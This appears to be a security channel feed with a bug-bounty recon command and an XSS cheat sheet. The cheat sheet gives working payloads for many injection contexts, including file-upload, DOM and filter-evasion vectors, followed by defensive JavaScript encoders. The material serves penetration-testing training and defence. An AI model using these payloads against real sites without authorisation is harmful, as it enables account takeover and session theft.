Brut Security
✅ Queries: @wtf_brut
🛃 WhatsApp: wa.link/brutsecurity
🈴 Training: brutsec.com
📨 E-mail: [email protected]
🌟 Use xargs with gau to scan bulk domains without losing speed 🌟

👉 Command

xargs -a alive.txt -I@ gau --blacklist css,jpg,jpeg,JPEG,ott,svg,js,ttf,png,woff2,woff,eot,gif "@" | tee -a gau.txt
🌟 XSS Secrets by Donald Bucks 🌟

HTML Injection
Use when input lands inside an attribute’s value of an HTML tag or outside a tag, except for the tags described in the next case. Prepend “-->” to the payload if input lands in an HTML comment.
<svg onload=alert(1)>
"><svg onload=alert(1)>

HTML Injection – Tag Block Breakout
Use when input lands inside or between opening/closing of the following tags:
<title><style><script><textarea><noscript><pre><xmp> and <iframe> (</tag> is accordingly).
</tag><svg onload=alert(1)>
"></tag><svg onload=alert(1)>

HTML Injection - Inline
Use when input lands inside an attribute’s value of an HTML tag but that tag can’t be terminated by a greater-than sign (>).
"onmouseover=alert(1) //
"autofocus onfocus=alert(1) //

HTML Injection - Source

Use when input lands as a value of the following HTML tag attributes: href, src, data or action (also formaction). The src attribute in script tags can be a URL or “data:,alert(1)”.
javascript:alert(1)

Javascript Injection
Use when input lands in a script block, inside a string delimited value.
'-alert(1)-'
'/alert(1)//


Javascript Injection - Escape Bypass
Use when input lands in a script block, inside a string delimited value but quotes are escaped by a backslash.
\'/alert(1)//

Javascript Injection – Script Breakout
Use when input lands anywhere within a script block.
</script><svg onload=alert(1)>

Javascript Injection - Logical Block
Use 1st or 2nd payloads when input lands in a script block, inside a string delimited value and inside a single logical block like function or conditional (if, else, etc). If quote is escaped with a backslash, use 3rd payload.
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//

Javascript Injection - Quoteless

Use when there’s multi reflection in the same line of JS code. 1st payload works in simple JS variables and 2nd one works in non-nested JS objects.
/alert(1)//\
/alert(1)}//\

Javascript Context - Placeholder Injection in Template Literal
Use when input lands inside backticks (``) delimited strings or in template engines.
${alert(1)}

Multi Reflection HTML Injection - Double Reflection (Single Input)
Use to take advantage of multiple reflections on same page.
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1='
/alert(1)</script><script>/

Multi Reflection HTML Injection - Triple Reflection (Single Input)
Use to take advantage of multiple reflections on same page.
/alert(1)">'onload="/<svg/1='
-alert(1)">'onload="<svg/1='
/</script>'>alert(1)/<script/1='

Multi Input Reflections HTML Injection - Double & Triple
Use to take advantage of multiple input reflections on same page. Also useful in HPP (HTTP Parameter Pollution) scenarios, where there are reflections for repeated parameters. 3rd payload makes use of comma-separated reflections of the same parameter.
p=<svg/1='&q='onload=alert(1)>
p=<svg 1='&q='onload='/&r=/alert(1)'>
q=<script/&q=/src=data:&q=alert(1)>



File Upload Injection – Filename
Use when uploaded filename is reflected somewhere in target page.
"><svg onload=alert(1)>.gif



File Upload Injection – Metadata
Use when metadata of uploaded file is reflected somewhere in target page. It uses command-line exiftool (“$” is the terminal prompt) and any metadata field can be set.
$ exiftool -Artist='"><svg onload=alert(1)>' xss.jpeg



File Upload Injection – SVG File
Use to create a stored XSS on target when uploading image files. Save content below as “xss.svg”.
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>



DOM Insert Injection
Use to test for XSS when injection gets inserted into DOM as valid markup instead of being reflected in source code. It works for cases where script tag and other vectors won’t work.
<img src=1 onerror=alert(1)>
<iframe src=javascript:alert(1)>
<details open ontoggle=alert(1)>
<svg><svg onload=alert(1)>



DOM Insert Injection – Resource Request
Use when native JavaScript code inserts into the page the results of a request to a URL that can be controlled by the attacker.
data:text/html,<img src=1 onerror=alert(1)>
data:text/html,<iframe src=javascript:alert(1)>



PHP Self URL Injection
Use when current URL is used by target’s underlying PHP code as an attribute value of an HTML form, for example. Inject between php extension and start of query part (?) using a leading slash (/).
https://brutelogic.com.br/xss.php/"><svg onload=alert(1)>?a=reader



Markdown Vector
Use in text boxes, comment sections, etc. that allow some markup input. Click to fire.
[clickme](javascript:alert`1`)
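
Seen from the defending side, every context listed in the cheat sheet above needs its own output encoding. The block below is an added example, not part of the original post: the helper names and the `https://app.example/` base URL are assumptions, and the sample inputs are constructed from payloads quoted in the post.

```javascript
// Added example: one output encoder per injection context (helper names are hypothetical).
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;", "`": "&#96;" };

// HTML body text and *quoted* attribute values: blocks tag and attribute breakouts.
function encodeHtml(value) {
  return String(value).replace(/[&<>"'`]/g, (c) => HTML_ENTITIES[c]);
}

// String literals inside a script block: every UTF-16 unit outside a small safe set
// becomes \uXXXX, so quotes, backslashes, "</script>", "${" and newlines stay data.
function encodeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9 ,._]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// href/src/action/formaction: parse first, then allow only http(s). The URL parser
// normalises case and strips tabs/newlines that hide a scheme from regex filters.
function safeUrl(value, base = "https://app.example/") { // base is an assumed origin
  let url;
  try {
    url = new URL(String(value), base);
  } catch {
    return "#";
  }
  return url.protocol === "http:" || url.protocol === "https:" ? encodeHtml(url.href) : "#";
}

const ENCODERS = new Map([["html", encodeHtml], ["attr", encodeHtml], ["js", encodeJsString], ["url", safeUrl]]);
function render(context, value) {
  const encode = ENCODERS.get(context);
  if (!encode) throw new Error("unknown context: " + context);
  return encode(value);
}

// Constructed sample inputs, taken from the payloads quoted in the post above.
const samples = [
  ["html", "<svg onload=alert(1)>"],
  ["attr", '"autofocus onfocus=alert(1) //'],
  ["js", "</script><svg onload=alert(1)>"],
  ["js", "${alert(1)}"],
  ["url", "javascript:alert(1)"],
  ["url", "/profile?id=7"],
];
for (const [context, value] of samples) {
  console.log(context.padEnd(5), JSON.stringify(value), "=>", render(context, value));
}
```

The HTML encoder is only safe for attribute values that the template wraps in quotes; unquoted attributes can be escaped with a plain space.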
SQL INJECTION 101.pdf
750.1 KB
🌟 Dnsbruter - DNS Bruteforcing Tool 🌟
👉 It is a powerful tool designed to perform active subdomain enumeration and discovery.

🔗 Link: https://github.com/sanjai-AK47/Dnsbruter/
TBHMv4 Recon 4.02.pdf
14.8 MB
Recon Guide by Jhaddix
Top 3 RXSS payloads

`'";//><img/src=x onError="${x};alert(`1`);">

`'";//><Img Src=a OnError=location=src>

`'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))>
❀6πŸ”₯3❀‍πŸ”₯1πŸ‘1